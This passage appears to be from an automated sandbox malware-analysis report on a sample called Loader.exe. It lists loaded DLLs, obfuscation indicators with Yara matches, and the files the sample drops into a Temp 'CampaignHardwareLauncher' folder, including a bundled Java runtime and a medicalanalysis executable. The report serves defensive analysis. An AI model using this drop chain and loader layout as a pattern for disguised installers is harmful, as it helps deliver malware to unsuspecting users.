                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: feclient.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msisip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wshext.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: esdsip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncryptprov.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptui.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: sxs.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: scrrun.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Loader.exeStatic file information: File size 96490794 > 1048576
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to behavior
                    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^(kdw&k source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000003.00000002.4553754247.000000006C301000.00000020.00000001.01000000.00000008.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000003.00000002.4551788732.000000006BEEA000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000003.00000002.4550390578.000000006BD01000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000003.00000002.4551504864.000000006BECD000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe
                    Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: Loader.exe, 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000003.00000000.2174031864.000000000075C000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000003.00000002.4531740229.000000000075C000.00000002.00000001.01000000.00000007.sdmp

                    Data Obfuscation

                    Source: Yara matchFile source: 13.2.medicalanalysis.exe.5940000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2858444058.0000000005940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: NAct.dll.0.drStatic PE information: real checksum: 0x35f7b should be: 0x3cde6
                    Source: UAC.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xde12
                    Source: uninst.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23c08
                    Source: jfxwebkit.dll.0.drStatic PE information: section name: .unwante
                    Source: prism_sw.dll.0.drStatic PE information: section name: _RDATA
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159BCAB7 pushad ; retf 3_3_159BCAC5
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159C20DA push B0159C21h; ret 3_3_159C20E9
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159C5E4B push ss; retn 0002h3_3_159C5E4C
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02445 push es; ret 3_3_15C02448
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01D57 push ecx; ret 3_3_15C01D58
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01FE1 pushad ; ret 3_3_15C02010
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C02387 push cs; ret 3_3_15C023D0
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E17 push edi; ret 3_3_15C01E18
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C0241D push edx; ret 3_3_15C02430
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01234 push 46ED0000h; retf 0077h3_3_15C0123A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15C01E35 push edi; ret 3_3_15C01E48
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_159FD859 pushfd ; iretd 3_3_159FD85A
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeCode function: 3_3_15BE57AA push eax; retf 3_3_15BE57AB
                    Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: msvcr100.dll0.0.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\w2k_lsa_auth.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\npjp2.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\servertool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\resource.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\policytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\npt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\nio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\verify.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\tnameserv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\nscB629.tmp\UAC.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_d3d.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\orbd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunmscapi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\splashscreen.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_sw.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeJump to dropped file
